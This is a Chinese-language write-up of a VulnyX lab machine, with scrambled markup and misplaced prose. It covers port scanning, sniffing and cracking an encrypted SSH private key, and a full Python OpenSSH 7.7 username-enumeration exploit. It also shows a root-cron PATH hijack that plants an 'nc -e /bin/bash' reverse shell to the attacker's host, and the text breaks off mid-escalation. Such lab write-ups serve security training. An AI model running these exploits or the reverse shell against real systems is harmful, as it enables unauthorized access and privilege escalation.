![\"image-20240528150019928\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202405281748537.png\")
<\/div>\n
![\"image-20240528162731310\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202405281748539.png\")
<\/div>\n
![\"image-20240528163602756\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202405281748541.png\")
<\/div><\/p>\n\u5f00\u6253\u7fa4\u4e3b\u5e08\u5085\u63a8\u8350\u7684\u7b2c\u4e00\u53f0 \u6ca1\u53d1\u73b0\u5565\uff0c\u5c1d\u8bd5\u522b\u7684\u529e\u6cd5\u3002<\/p>\n \u6ca1\u6709\u9690\u85cf\u7a97\u53e3\u548c\u5947\u602a\u7684\u76ee\u5f55\uff0c\u5c1d\u8bd5\u76d1\u542c\u4e00\u4e0b\u6d41\u91cf\uff1a<\/p>\n \u53ef\u4ee5\u770b\u5230\uff0c\u53d1\u4e86\u4e00\u4e2a\u79c1\u94a5\uff0cbase64\u590d\u5236\u51fa\u6765\uff1a<\/p>\n \u4f7f\u7528 \u52a0\u5bc6\u8fc7\u7684\u5bc6\u94a5\uff0c\u5148\u5c1d\u8bd5\u7834\u89e3\u4e00\u4e0b\u5427\uff1a<\/p>\n \u5f97\u5c1d\u8bd5\u5f97\u5230\u7528\u6237\u540d\uff0c\u6ca1\u6709\u627e\u5230\uff0c\u5c1d\u8bd5\u641c\u7d22\u4e00\u4e0b\u76f8\u5173\u6f0f\u6d1e\uff0c\u524d\u9762\u53d1\u73b0\u4e86 \u53d1\u73b0\u7b2c\u4e09\u4e2a\u662f\u6211\u4eec\u60f3\u8981\u7684\uff0c\u53ef\u4ee5\u5f97\u5230\u7528\u6237\u8fdb\u884c\u8fde\u63a5\uff01\u4f46\u662f\u8fd9\u4e2a\u662f \u4f7f\u7528\u4e00\u4e0b\uff1a<\/p>\n \u627e\u5230\u7528\u6237\u540d\uff0c\u5c1d\u8bd5\u8fdb\u884c\u8fde\u63a5\uff1a<\/p>\n \u53d1\u73b0\u4e86\u4e00\u4e2a \u4e00\u76f4\u6ca1\u5f39\u56de\u6765\uff0c\u4e00\u770b\u53d1\u73b0\uff1a<\/p>\n \u770b\u6765\u5f97\u6539\u6210\u5b9a\u65f6\u4efb\u52a1\u4e2d\u7684\u73af\u5883\u53d8\u91cf\uff1a<\/p>\n \u8fd9\u65f6\u5019\u8def\u5f84\u5c31\u5bf9\u4e86\uff1a<\/p>\nvulnyx<\/code>\u9776\u673a\uff01<\/p>\n\u4fe1\u606f\u641c\u96c6<\/h2>\n
\u7aef\u53e3\u626b\u63cf<\/h3>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Listen]\n\u2514\u2500$ rustscan -a 172.20.10.3 -- -A\n.----. .-. .-. .----..---. .----. .---. .--. .-. .-.\n| {} }| { } |{ {__ {_ _}{ {__ \/ ___} \/ {} \\ | `| |\n| .-. \\| {_} |.-._} } | | .-._} }\\ }\/ \/\\ \\| |\\ |\n`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'\nThe Modern Day Port Scanner.\n________________________________________\n: https:\/\/discord.gg\/GFrQsGy :\n: https:\/\/github.com\/RustScan\/RustScan :\n --------------------------------------\nNmap? More like slowmap.\ud83d\udc22\n\n[~] The config file is expected to be at "\/home\/kali\/.rustscan.toml"\n[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers\n[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'. \nOpen 172.20.10.3:22\nOpen 172.20.10.3:8000\nPORT STATE SERVICE REASON VERSION\n22\/tcp open ssh syn-ack OpenSSH 7.7 (protocol 2.0)\n| ssh-hostkey: \n| 2048 0c:3f:13:54:6e:6e:e6:56:d2:91:eb:ad:95:36:c6:8d (RSA)\n| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDhemxEZcm98GFwIRozVUePnC+Cejni5lScAa7ha5neDlWQT2e6dbubOkddku\/qgtgY4\/kw\/pGPh7oTqHg9WKHTMqTAzdN0DDaU\/5twewwMf6s9ERuuYYieP7mzjsX2APhOr23CFWVr37Y+mQ\/A4J0ODizpr\/mggCCi6kqHqyRWgcPG98AVJ9IjPehVkptQdLpQlSOV8EzJClu6tBInWzxtGi5v0B94lMYRDXqZE9Z1wCSh9oU0HnwRwfFqB0dcOH+kDZVLYi06aiHKXkKgSFM3G6LJQY8ad4FCEc7TU+agLRPHFUPFqqPbf9hbDD7MUdR4pXEQtJ1p\/D\/9rdbBg1Sp\n| 256 9b:e6:8e:14:39:7a:17:a3:80:88:cd:77:2e:c3:3b:1a (ECDSA)\n| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBB+zmcUltQUYUVvvfWqtUjdFpCh0IkOnPjmcctTpnXS7MWK37n6h9DEq4WNsHmauyKEuRnml5mOLUbNIZHHUBgY=\n| 256 85:5a:05:2a:4b:c0:b2:36:ea:8a:e2:8a:b2:ef:bc:df (ED25519)\n|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIHNArrcR981CzORruPnEn\/opg56t7SFktwnhZzGpXcfE\n8000\/tcp open http syn-ack SimpleHTTPServer 0.6 (Python 3.7.3)\n| http-methods: \n|_ Supported Methods: GET HEAD\n|_http-title: Site doesn't have a title (text\/html).\n|_http-server-header: SimpleHTTP\/0.6 Python\/3.7.3<\/code><\/pre>\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Listen]\n\u2514\u2500$ curl http:\/\/172.20.10.3:8000 \nYou just have to listen to open the door...<\/code><\/pre>\n\u76ee\u5f55\u626b\u63cf<\/h3>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Listen]\n\u2514\u2500$ gobuster dir -u http:\/\/172.20.10.3:8000\/ -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt \n===============================================================\nGobuster v3.6\nby OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)\n===============================================================\n[+] Url: http:\/\/172.20.10.3:8000\/\n[+] Method: GET\n[+] Threads: 10\n[+] Wordlist: \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt\n[+] Negative Status codes: 404\n[+] User Agent: gobuster\/3.6\n[+] Timeout: 10s\n===============================================================\nStarting gobuster in directory enumeration mode\n===============================================================\nProgress: 20630 \/ 220561 (9.35%)[ERROR] Get "http:\/\/172.20.10.3:8000\/enlarge": dial tcp 172.20.10.3:8000: i\/o timeout (Client.Timeout exceeded while awaiting headers)\n[ERROR] Get "http:\/\/172.20.10.3:8000\/5082": dial tcp 172.20.10.3:8000: i\/o timeout (Client.Timeout exceeded while awaiting headers)\n[ERROR] Get "http:\/\/172.20.10.3:8000\/pantech": context deadline exceeded (Client.Timeout exceeded while awaiting headers)\n[ERROR] Get "http:\/\/172.20.10.3:8000\/cursor": context deadline exceeded (Client.Timeout exceeded while awaiting headers)\n[ERROR] Get "http:\/\/172.20.10.3:8000\/chairman": context deadline exceeded (Client.Timeout exceeded while awaiting headers)\n[ERROR] Get "http:\/\/172.20.10.3:8000\/DA": context deadline exceeded (Client.Timeout exceeded while awaiting headers)\n[ERROR] Get "http:\/\/172.20.10.3:8000\/Repository": context deadline exceeded (Client.Timeout exceeded while awaiting headers)\n[ERROR] Get "http:\/\/172.20.10.3:8000\/sony-ericsson": context deadline exceeded (Client.Timeout exceeded while awaiting headers)\n[ERROR] Get "http:\/\/172.20.10.3:8000\/reach": context deadline exceeded (Client.Timeout exceeded while awaiting headers)\n[ERROR] Get "http:\/\/172.20.10.3:8000\/2002_03": context deadline exceeded (Client.Timeout exceeded while awaiting headers)\nProgress: 28405 \/ 220561 (12.88%)[ERROR] Get "http:\/\/172.20.10.3:8000\/strs": dial tcp 172.20.10.3:8000: i\/o timeout (Client.Timeout exceeded while awaiting headers)\n[ERROR] Get "http:\/\/172.20.10.3:8000\/3560": dial tcp 172.20.10.3:8000: i\/o timeout (Client.Timeout exceeded while awaiting headers)\n[ERROR] Get "http:\/\/172.20.10.3:8000\/5993": dial tcp 172.20.10.3:8000: i\/o timeout (Client.Timeout exceeded while awaiting headers)\n[ERROR] Get "http:\/\/172.20.10.3:8000\/4333": context deadline exceeded (Client.Timeout exceeded while awaiting headers)\n[ERROR] Get "http:\/\/172.20.10.3:8000\/npp": context deadline exceeded (Client.Timeout exceeded while awaiting headers)\n[ERROR] Get "http:\/\/172.20.10.3:8000\/virusencyclo": context deadline exceeded (Client.Timeout exceeded while awaiting headers)\n[ERROR] Get "http:\/\/172.20.10.3:8000\/4202": context deadline exceeded (Client.Timeout exceeded while awaiting headers)\nProgress: 36205 \/ 220561 (16.41%)^C\n[!] Keyboard interrupt detected, terminating.\nProgress: 36222 \/ 220561 (16.42%)\n[ERROR] context canceled\n===============================================================\nFinished\n===============================================================<\/code><\/pre>\n\u6d41\u91cf\u76d1\u542c<\/h3>\n
![\"image-20240528164606622\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202405281748542.png\")
<\/div><\/p>\n\/\/\/\/\/\/\/\/NC63CD2hCABFAAXcG8kgAEARgzGsFAoD\/\/\/\/\/8h9\/egG10zDLS0tLS1CRUdJTiBSU0EgUFJJVkFURSBLRVktLS0tLQpQcm9jLVR5cGU6IDQsRU5DUllQVEVECkRFSy1JbmZvOiBERVMtRURFMy1DQkMsRjExOUYyMUY3NTdBQTAyRQoKNjBWRFRUQUVLTitHNDJVYWF6RjZTcFlEVm1yL3Y2bjJ2UDFGYWdzMjExbzZmNWkxM2xjUnZseHJEbk9yL1pUdgpobEZ1UkR3K2VkNFBIL2JsQ3VzVEJZRzgzSklhbFRUaWFxalZaTUhOZVozZG4wVkE0enVOZk0yYTFFUDVTWkZuCnBubXlIeFgzc3hpNnU4ajZGRUg3K05zQkkyanZWbFlUYkNMYUF0NmJBN3RCdjhxRUtoK1JiODdZZjRrS284ZmwKWkRuc2tIRGRJL2RqalVSL0EyNUp4UlhPZm4xU3EvL3NoVTFOV2xpK0NOalVoUU81SXJ1SmNlV0JBZzhrY2l1MApockpEL0V4cWJnT0R6c0hCRVl1WEUvQytJNVRRTlJKTFJYdnAwVkN3ZzloU0Mrc2Qyb3lHZG9rNE05Rml5bjZhCnE1MTdoalFxMkM1UGg4NVN4OHdtc3VRNG5BNVFYUjM3NVFjNVBrb2RsVnpyUVR6TkxDY2J0STZJV081bVFHV0IKQVVsRVYyNjljd3k2dFhxVlZoazdEQ09Yam9pZWtzcE1ONWZMbHlBQWUwY1RpTTlVazVBdzdoSWpuUjFad2VpdApoNGZXOXZxRzRmclhCakFKNnFuSHpaaWtOcU1nNk1VWVFtY0pDcGJVUGVHUHYvR2ZkK3dwVW5CR212UWtDdnozCjUrakc5U09MTHJkSEROQzZVMThoVDFsdWJUUHpnOGFFNGtkUXhRU3UyZ0tSTjhiWWlDTE5FcVpjU0NBTldtTXEKY203K2NVaVUvN1h4SWN6dlZxeWUyZWxXZ0NnYm8wbTRVU3dJZUVlTmNHV29QcWdZYUNmS3g2aVprWGZMTEp6MwpPUVE3Smd1Wk5zK3YrTjRNd3Y1WVNKZVZoT1dMU2tlUmcyUkplOG5OU0NvVHdsK2FEdk92cmJkOEdlY1pJZ1BLCmdYSEJrejNZV3RDTVR1M2M3QUF5T3ZPSWdEMW4zQU5uTmRNWFhLQXEwV2l1OFVEcUxERUlHMzJqRkUzeVUyRWYKQzlLd2UvU3VYTWF6THJ6ZDJRb0w2K3BJMExLK1cyT1lDY3NnTnVoSUhHK3RGNjc0WWIwLzRLNWZsVkFsR3FYVAp4Y3creEltRjV1ejFaTmVRbFM0ZndSM0QxOEFiZklyeDduaHNFMU1Xb0RpRXRKVlUwamNNK0pHaDNsRWxGQkZ2CmF4NktWR1J5QTFtZzhRZjNHbVp1eW5nKzFZTkMyeHNWSWJhNTJSVWxQZFJTWjZNb2xWeXROZlRQanN5enN3cGMKV1Z1ZmR4VThtZ0NTS0p3aHlkZ1BjMHdVOXAzMmtEQ25pTlpXbzg2Y1NZQ0JxcElpcG90a0hBamRENi9BWGhPVwp2ZUoycUx0c0hJaXFyazVJckRndUF0TWd4YkdkZ2lHTUhyT2N3WEt0TTJNQ1JOZzdpMWszbjYvYjJQM1h4MGpTCk1VRVlJR3lqUmwwMVkzcEdaaGZwWjR1UmtsWUVqZFQ5eGt0RnJmTnBoaXBRcWhpK3B3ZzQzY2V0dExWeFdyNE4KbEVSMjRITWtjMGpCV09XQStkZWhlRGR6U0IyamthRlNuNEpmVW51amVHbWhmU0pseGJab2hRNW56UUFwQUxLOApTcFp5RGM4ek9ndm1ZSXpUR1A4RWlmODZRTnJsTjBORHNzcncxcDhJbklidkdacjdBaXZqRnhsVUNWdFBlRGhHCjRkSjd6cUhUT0R0VllkSzNXWUhnMGpaTGtXM1FROVBIVzJTYWtEaEp3eFM2ci9WdGJPSi8rQUJsdTFvVUphMysKaFowc3hURUh0RnE=\n\/\/\/\/\/\/\/\/NC63CD2hCABFAAEjG5AAuUARp2qsFAoD\/\/\/\/\/0VlejRxTC9jMW1GSnBSSnZ5ZHZRcFpiSytUTVN6dEJiaW9PNEx5UTgzWXdFRTY0Z3pNZkcyCk1DcTh2TDJLV1VoWlRuSVlTME9aSXA4Wmp4cDdXclVKWWRESDBVNEVGWlJJOGtRaHcya2ZPQTVndSthcEZPMVoKREdIZENLZ002WnhqQnBLUFpaM2hER21NQ2VETVA2SEtDZ2pRL01JWUZQN3kzK1lYcEJyS01BRlJ3d24xVmxYSQo1R0w2MUZ4TVRxMzBvQTNGRXNwVWtOMDZLOHlkLzg1TEs3WFMyT1h3U283QVFja0pnaEhzd2c9PQotLS0tLUVORCBSU0EgUFJJVkFURSBLRVktLS0tLQo=<\/code><\/pre>\n\u6f0f\u6d1e\u5229\u7528<\/h2>\n
RSA\u7834\u89e3\u8fde\u63a5<\/h3>\n
cyberchef<\/code>\u5bf9\u7167\u6539\u4e00\u4e0b\u5f97\u5230\u660e\u6587\uff1a<\/p>\n![\"image-20240528165914359\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202405281748543.png\")
<\/div><\/p>\n-----BEGIN RSA PRIVATE KEY-----\nProc-Type: 4,ENCRYPTED\nDEK-Info: DES-EDE3-CBC,F119F21F757AA02E\n\n60VDTTAEKN+G42UaazF6SpYDVmr\/v6n2vP1Fags211o6f5i13lcRvlxrDnOr\/ZTv\nhlFuRDw+ed4PH\/blCusTBYG83JIalTTiaqjVZMHNeZ3dn0VA4zuNfM2a1EP5SZFn\npnmyHxX3sxi6u8j6FEH7+NsBI2jvVlYTbCLaAt6bA7tBv8qEKh+Rb87Yf4kKo8fl\nZDnskHDdI\/djjUR\/A25JxRXOfn1Sq\/\/shU1NWli+CNjUhQO5IruJceWBAg8kciu0\nhrJD\/ExqbgODzsHBEYuXE\/C+I5TQNRJLRXvp0VCwg9hSC+sd2oyGdok4M9Fiyn6a\nq517hjQq2C5Ph85Sx8wmsuQ4nA5QXR375Qc5PkodlVzrQTzNLCcbtI6IWO5mQGWB\nAUlEV269cwy6tXqVVhk7DCOXjoiekspMN5fLlyAAe0cTiM9Uk5Aw7hIjnR1Zweit\nh4fW9vqG4frXBjAJ6qnHzZikNqMg6MUYQmcJCpbUPeGPv\/Gfd+wpUnBGmvQkCvz3\n5+jG9SOLLrdHDNC6U18hT1lubTPzg8aE4kdQxQSu2gKRN8bYiCLNEqZcSCANWmMq\ncm7+cUiU\/7XxIczvVqye2elWgCgbo0m4USwIeEeNcGWoPqgYaCfKx6iZkXfLLJz3\nOQQ7JguZNs+v+N4Mwv5YSJeVhOWLSkeRg2RJe8nNSCoTwl+aDvOvrbd8GecZIgPK\ngXHBkz3YWtCMTu3c7AAyOvOIgD1n3ANnNdMXXKAq0Wiu8UDqLDEIG32jFE3yU2Ef\nC9Kwe\/SuXMazLrzd2QoL6+pI0LK+W2OYCcsgNuhIHG+tF674Yb0\/4K5flVAlGqXT\nxcw+xImF5uz1ZNeQlS4fwR3D18AbfIrx7nhsE1MWoDiEtJVU0jcM+JGh3lElFBFv\nax6KVGRyA1mg8Qf3GmZuyng+1YNC2xsVIba52RUlPdRSZ6MolVytNfTPjsyzswpc\nWVufdxU8mgCSKJwhydgPc0wU9p32kDCniNZWo86cSYCBqpIipotkHAjdD6\/AXhOW\nveJ2qLtsHIiqrk5IrDguAtMgxbGdgiGMHrOcwXKtM2MCRNg7i1k3n6\/b2P3Xx0jS\nMUEYIGyjRl01Y3pGZhfpZ4uRklYEjdT9xktFrfNphipQqhi+pwg43cettLVxWr4N\nlER24HMkc0jBWOWA+deheDdzSB2jkaFSn4JfUnujeGmhfSJlxbZohQ5nzQApALK8\nSpZyDc8zOgvmYIzTGP8Eif86QNrlN0NDssrw1p8InIbvGZr7AivjFxlUCVtPeDhG\n4dJ7zqHTODtVYdK3WYHg0jZLkW3QQ9PHW2SakDhJwxS6r\/VtbOJ\/+ABlu1oUJa3+\nhZ0sxTEHtFqEez4qL\/c1mFJpRJvydvQpZbK+TMSztBbioO4LyQ83YwEE64gzMfG2\nMCq8vL2KWUhZTnIYS0OZIp8Zjxp7WrUJYdDH0U4EFZRI8kQhw2kfOA5gu+apFO1Z\nDGHdCKgM6ZxjBpKPZZ3hDGmMCeDMP6HKCgjQ\/MIYFP7y3+YXpBrKMAFRwwn1VlXI\n5GL61FxMTq30oA3FEspUkN06K8yd\/85LK7XS2OXwSo7AQckJghHswg==\n-----END RSA PRIVATE KEY-----<\/code><\/pre>\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Listen]\n\u2514\u2500$ vim listen \n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Listen]\n\u2514\u2500$ chmod 600 listen\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Listen]\n\u2514\u2500$ ssh2john listen > hash\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Listen]\n\u2514\u2500$ john --wordlist=\/usr\/share\/wordlists\/rockyou.txt hash\nUsing default input encoding: UTF-8\nLoaded 1 password hash (SSH, SSH private key [RSA\/DSA\/EC\/OPENSSH 32\/64])\nCost 1 (KDF\/cipher [0=MD5\/AES 1=MD5\/3DES 2=Bcrypt\/AES]) is 1 for all loaded hashes\nCost 2 (iteration count) is 2 for all loaded hashes\nWill run 2 OpenMP threads\nPress 'q' or Ctrl-C to abort, almost any other key for status\nidontknow (listen) \n1g 0:00:00:00 DONE (2024-05-28 05:08) 3.225g\/s 4180p\/s 4180c\/s 4180C\/s cuties..rangers1\nUse the "--show" option to display all of the cracked passwords reliably\nSession completed.\n\n# \u6216\u8005\u5c1d\u8bd5RSAcrack\u7834\u89e3\uff0c\u6211\u4e5f\u8bd5\u4e86\u4e00\u4e0b\uff1a\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Listen]\n\u2514\u2500$ rsacrack -w \/usr\/share\/wordlists\/rockyou.txt -k listen\n\n\u256d\u2501\u2501\u2501\u2533\u2501\u2501\u2501\u2533\u2501\u2501\u2501\u256e \u256d\u256e \n\u2503\u256d\u2501\u256e\u2503\u256d\u2501\u256e\u2503\u256d\u2501\u256e\u2503 \u2503\u2503 \n\u2503\u2570\u2501\u256f\u2503\u2570\u2501\u2501\u252b\u2503 \u2503\u2523\u2501\u2501\u2533\u2501\u2533\u2501\u2501\u2533\u2501\u2501\u252b\u2503\u256d\u256e\n\u2503\u256d\u256e\u256d\u253b\u2501\u2501\u256e\u2503\u2570\u2501\u256f\u2503\u256d\u2501\u252b\u256d\u252b\u256d\u256e\u2503\u256d\u2501\u252b\u2570\u256f\u256f\n\u2503\u2503\u2503\u2570\u252b\u2570\u2501\u256f\u2503\u256d\u2501\u256e\u2503\u2570\u2501\u252b\u2503\u2503\u256d\u256e\u2503\u2570\u2501\u252b\u256d\u256e\u256e\n\u2570\u256f\u2570\u2501\u253b\u2501\u2501\u2501\u253b\u256f \u2570\u253b\u2501\u2501\u253b\u256f\u2570\u256f\u2570\u253b\u2501\u2501\u253b\u256f\u2570\u256f\n-=========================-\n[*] Cracking: listen\n[*] Wordlist: \/usr\/share\/wordlists\/rockyou.txt\n[i] Status:\n 1283\/14344392\/0%\/idontknow\n[+] Password: idontknow Line: 1283<\/code><\/pre>\nOpenSSH 7.7<\/code>\u7684\u7248\u672c\uff0c\u770b\u4e00\u4e0b\u662f\u5426\u6709\u76f8\u5173\u6f0f\u6d1e\uff1a<\/p>\n![\"image-20240528171723427\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202405281748544.png\")
<\/div><\/p>\npython2<\/code>\u7684\uff0c\u5c1d\u8bd5\u6362\u4e00\u4e2apython3<\/code>\u7684:<\/p>\n#!\/usr\/bin\/env python3\n\nimport argparse, logging, paramiko, socket, sys, os\n\nclass InvalidUsername(Exception):\n pass\n\n# malicious function to malform packet\ndef add_boolean(*args, **kwargs):\n pass\n\n# function that'll be overwritten to malform the packet\nold_service_accept = paramiko.auth_handler.AuthHandler._client_handler_table[\n paramiko.common.MSG_SERVICE_ACCEPT]\n\n# malicious function to overwrite MSG_SERVICE_ACCEPT handler\ndef service_accept(*args, **kwargs):\n old_add_boolean = paramiko.message.Message.add_boolean\n paramiko.message.Message.add_boolean = add_boolean\n result = old_service_accept(*args, **kwargs)\n paramiko.message.Message.add_boolean = old_add_boolean\n return result\n\n# call when username was invalid \ndef invalid_username(*args, **kwargs):\n raise InvalidUsername()\n\n# assign functions to respective handlers\nparamiko.auth_handler.AuthHandler._client_handler_table[paramiko.common.MSG_SERVICE_ACCEPT] = service_accept\nparamiko.auth_handler.AuthHandler._client_handler_table[paramiko.common.MSG_USERAUTH_FAILURE] = invalid_username\n\n# Print valid users found out so far\ndef print_result(valid_users):\n if(valid_users):\n print("Valid Users: ")\n for user in valid_users:\n print(user)\n else:\n print("No valid user detected.")\n\n# perform authentication with malicious packet and username\ndef check_user(username):\n try:\n sock = socket.socket()\n sock.connect((args.target, int(args.port)))\n transport = paramiko.transport.Transport(sock)\n transport.start_client(timeout=0.5)\n\n except paramiko.ssh_exception.SSHException:\n print('[!] Failed to negotiate SSH transport')\n sys.exit(2)\n\n try:\n transport.auth_publickey(username, paramiko.RSAKey.generate(2048))\n except paramiko.ssh_exception.AuthenticationException:\n print("[+] {} is a valid username".format(username))\n return True\n except:\n print("[-] {} is an invalid username".format(username))\n return False\n\ndef check_userlist(wordlist_path):\n if os.path.isfile(wordlist_path):\n valid_users = []\n with open(wordlist_path) as f:\n for line in f:\n username = line.rstrip()\n try:\n if(check_user(username)):\n valid_users.append(username)\n except KeyboardInterrupt:\n print("Enumeration aborted by user!")\n break;\n\n print_result(valid_users)\n else:\n print("[-] {} is an invalid wordlist file".format(wordlist_path))\n sys.exit(2)\n\n# remove paramiko logging\nlogging.getLogger('paramiko.transport').addHandler(logging.NullHandler())\n\nparser = argparse.ArgumentParser(description='SSH User Enumeration by Leap Security (@LeapSecurity)')\nparser.add_argument('target', help="IP address of the target system")\nparser.add_argument('-p', '--port', default=22, help="Set port of SSH service")\nparser.add_argument('-u', '--user', dest='username', help="Username to check for validity.")\nparser.add_argument('-w', '--wordlist', dest='wordlist', help="username wordlist")\n\nif len(sys.argv) == 1:\n parser.print_help()\n sys.exit(1)\n\nargs = parser.parse_args()\n\nif args.wordlist:\n check_userlist(args.wordlist)\nelif args.username:\n check_user(args.username)\nelse:\n print("[-] Username or wordlist must be specified!\\n")\n parser.print_help()\n sys.exit(1)<\/code><\/pre>\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Listen]\n\u2514\u2500$ python3 exp.py 172.20.10.3 -p 22 -w \/usr\/share\/seclists\/Usernames\/Names\/names.txt \n---------------\n[+] abel is a valid username\n---------------\n[-] amnish is an invalid username\n[-] amnon is an invalid username\n^CEnumeration aborted by user!\nValid Users: \nabel<\/code><\/pre>\n![\"image-20240528173214096\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202405281748545.png\")
<\/div><\/p>\n\u63d0\u6743<\/h2>\n
\u5148\u63d0\u5347\u4e00\u4e0b\u4ea4\u4e92shell<\/h3>\n
abel@listen:~$ bash\nabel@listen:~$ ls -la\ntotal 32\ndrwx------ 4 abel abel 4096 Jun 3 2023 .\ndrwxr-xr-x 3 root root 4096 Jun 3 2023 ..\nlrwxrwxrwx 1 root root 9 Jun 20 2021 .bash_history -> \/dev\/null\n-rw-r--r-- 1 abel abel 220 Jun 12 2021 .bash_logout\n-rw-r--r-- 1 abel abel 3526 Jun 12 2021 .bashrc\ndrwxr-xr-x 3 abel abel 4096 Jun 3 2023 .local\n-rw-r--r-- 1 abel abel 66 Jun 12 2021 .selected_editor\ndrwx------ 2 abel abel 4096 Jun 3 2023 .ssh\n-r-------- 1 abel abel 33 Jun 3 2023 user.txt\nabel@listen:~$ cat user.txt \n33f3f86a697126c6fe0a39a337ade21a<\/code><\/pre>\n\u4fe1\u606f\u641c\u96c6<\/h3>\n
abel@listen:~$ sudo -l\nbash: sudo: command not found\nabel@listen:~$ find \/ -perm -u=s -type f 2>\/dev\/null \n\/usr\/bin\/su\n\/usr\/bin\/passwd\n\/usr\/bin\/mount\n\/usr\/bin\/umount\n\/usr\/bin\/chsh\n\/usr\/bin\/newgrp\n\/usr\/lib\/openssh\/ssh-keysign\n\/usr\/lib\/eject\/dmcrypt-get-device\n\/usr\/lib\/dbus-1.0\/dbus-daemon-launch-helper\nabel@listen:~$ \/usr\/sbin\/getcap -r \/ 2>\/dev\/null\n\/usr\/bin\/ping = cap_net_raw+ep\nabel@listen:~$ cat \/etc\/cron*\ncat: \/etc\/cron.d: Is a directory\ncat: \/etc\/cron.daily: Is a directory\ncat: \/etc\/cron.hourly: Is a directory\ncat: \/etc\/cron.monthly: Is a directory\n# \/etc\/crontab: system-wide crontab\n# Unlike any other crontab you don't have to run the `crontab'\n# command to install the new version when you edit this file\n# and files in \/etc\/cron.d. These files also have username fields,\n# that none of the other crontabs do.\n\nSHELL=\/bin\/sh\nPATH=\/usr\/local\/sbin:\/dev\/shm:\/usr\/local\/bin:\/sbin:\/bin:\/usr\/sbin:\/usr\/bin\n\n# Example of job definition:\n# .---------------- minute (0 - 59)\n# | .------------- hour (0 - 23)\n# | | .---------- day of month (1 - 31)\n# | | | .------- month (1 - 12) OR jan,feb,mar,apr ...\n# | | | | .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat\n# | | | | |\n# * * * * * user-name command to be executed\n17 * * * * root cd \/ && run-parts --report \/etc\/cron.hourly\n25 6 * * * root test -x \/usr\/sbin\/anacron || ( cd \/ && run-parts --report \/etc\/cron.daily )\n47 6 * * 7 root test -x \/usr\/sbin\/anacron || ( cd \/ && run-parts --report \/etc\/cron.weekly )\n52 6 1 * * root test -x \/usr\/sbin\/anacron || ( cd \/ && run-parts --report \/etc\/cron.monthly )\n#\n* * * * * root cp \/var\/www\/html\/index.html \/tmp\ncat: \/etc\/cron.weekly: Is a directory<\/code><\/pre>\n\u73af\u5883\u53d8\u91cf\u63d0\u6743<\/h3>\n
root<\/code>\u7ea7\u522b\u7684\u5b9a\u65f6\u4efb\u52a1\uff0c\u4e14\u4f7f\u7528\u7684\u662f\u76f8\u5bf9\u4f4d\u7f6e\u5e76\u975e\u7edd\u5bf9\u4f4d\u7f6e\uff0c\u5c1d\u8bd5\u8fdb\u884c\u63d0\u6743\uff1a<\/p>\nabel@listen:~$ echo $PATH\n\/usr\/local\/bin:\/usr\/bin:\/bin:\/usr\/local\/games:\/usr\/games\nabel@listen:~$ cd \/tmp\nabel@listen:\/tmp$ nc\nCmd line: ^C\nabel@listen:\/tmp$ nc -h\n[v1.10-41.1]\nconnect to somewhere: nc [-options] hostname port[s] [ports] ... \nlisten for inbound: nc -l -p port [-options] [hostname] [port]\noptions:\n -c shell commands as `-e'; use \/bin\/sh to exec [dangerous!!]\n -e filename program to exec after connect [dangerous!!]\n -b allow broadcasts\n -g gateway source-routing hop point[s], up to 8\n -G num source-routing pointer: 4, 8, 12, ...\n -h this cruft\n -i secs delay interval for lines sent, ports scanned\n -k set keepalive option on socket\n -l listen mode, for inbound connects\n -n numeric-only IP addresses, no DNS\n -o file hex dump of traffic\n -p port local port number\n -r randomize local and remote ports\n -q secs quit after EOF on stdin and delay of secs\n -s addr local source address\n -T tos set Type Of Service\n -t answer TELNET negotiation\n -u UDP mode\n -v verbose [use twice to be more verbose]\n -w secs timeout for connects and final net reads\n -C Send CRLF as line-ending\n -z zero-I\/O mode [used for scanning]\nport numbers can be individual or ranges: lo-hi [inclusive];\nhyphens in port names must be backslash escaped (e.g. 'ftp\\-data').\nabel@listen:\/tmp$ echo 'nc -e \/bin\/bash 172.20.10.8 1234' > cp\nabel@listen:\/tmp$ cat cp\nnc -e \/bin\/bash 172.20.10.8 1234\nabel@listen:\/tmp$ chmod +x cp\nabel@listen:\/tmp$ PATH=$PWD:$PATH\nabel@listen:\/tmp$ echo $PATH\n\/tmp:\/usr\/local\/bin:\/usr\/bin:\/bin:\/usr\/local\/games:\/usr\/games<\/code><\/pre>\nabel@listen:\/tmp$ whereis cp\ncp: \/usr\/bin\/cp \/tmp\/cp \/usr\/share\/man\/man1\/cp.1.gz\nabel@listen:\/tmp$ ls -l \/var\/www\/html\/index.html\n-rw-r--r-- 1 abel abel 44 Jun 3 2023 